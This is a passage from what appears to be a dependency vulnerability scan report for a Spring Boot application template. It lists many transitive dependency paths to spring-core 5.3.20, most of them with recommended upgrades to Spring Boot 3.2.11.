  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.data:spring-data-jpa@2.7.2 org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-config@5.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-web@5.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework:spring-webmvc@5.3.22 org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-devtools@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-devtools@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-actuator-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-cache@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-cache@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-mail@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-mail@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-thymeleaf@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-thymeleaf@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-aop@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-jdbc@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-json@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.data:spring-data-jpa@2.7.2 org.springframework:spring-tx@7.0.0-M9 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-jdbc@2.7.3 org.springframework:spring-jdbc@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.data:spring-data-jpa@2.7.2 org.springframework.data:spring-data-commons@4.0.0-M6 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.data:spring-data-jpa@2.7.2 org.springframework:spring-orm@7.0.0-M9 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-config@5.7.3 org.springframework.security:spring-security-core@5.7.3 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-web@5.7.3 org.springframework.security:spring-security-core@5.7.3 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-web@5.7.3 org.springframework:spring-web@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-json@2.7.3 org.springframework:spring-web@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework:spring-webmvc@5.3.22 org.springframework:spring-web@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.hateoas:spring-hateoas@1.5.1 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.hateoas:spring-hateoas@2.3.4.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.hateoas:spring-hateoas@1.5.1 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-aop@2.7.3 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.data:spring-data-jpa@2.7.2 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-config@5.7.3 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-web@5.7.3 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework:spring-webmvc@5.3.22 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.hateoas:spring-hateoas@1.5.1 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-devtools@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-devtools@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-cache@2.7.3 org.springframework:spring-context-support@5.3.22 org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-cache@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-mail@2.7.3 org.springframework:spring-context-support@5.3.22 org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-mail@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.data:spring-data-jpa@2.7.2 org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-config@5.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-web@5.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework:spring-webmvc@5.3.22 org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.data:spring-data-jpa@2.7.2 org.springframework:spring-tx@7.0.0-M9 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-jdbc@2.7.3 org.springframework:spring-jdbc@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.data:spring-data-jpa@2.7.2 org.springframework.data:spring-data-commons@4.0.0-M6 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.data:spring-data-jpa@2.7.2 org.springframework:spring-orm@7.0.0-M9 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-config@5.7.3 org.springframework.security:spring-security-core@5.7.3 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-web@5.7.3 org.springframework.security:spring-security-core@5.7.3 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-web@5.7.3 org.springframework:spring-web@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-json@2.7.3 org.springframework:spring-web@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework:spring-webmvc@5.3.22 org.springframework:spring-web@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.hateoas:spring-hateoas@1.5.1 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-devtools@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-devtools@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-cache@2.7.3 org.springframework:spring-context-support@5.3.22 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-cache@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-mail@2.7.3 org.springframework:spring-context-support@5.3.22 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-mail@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.data:spring-data-jpa@2.7.2 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-config@5.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-web@5.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework:spring-webmvc@5.3.22 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
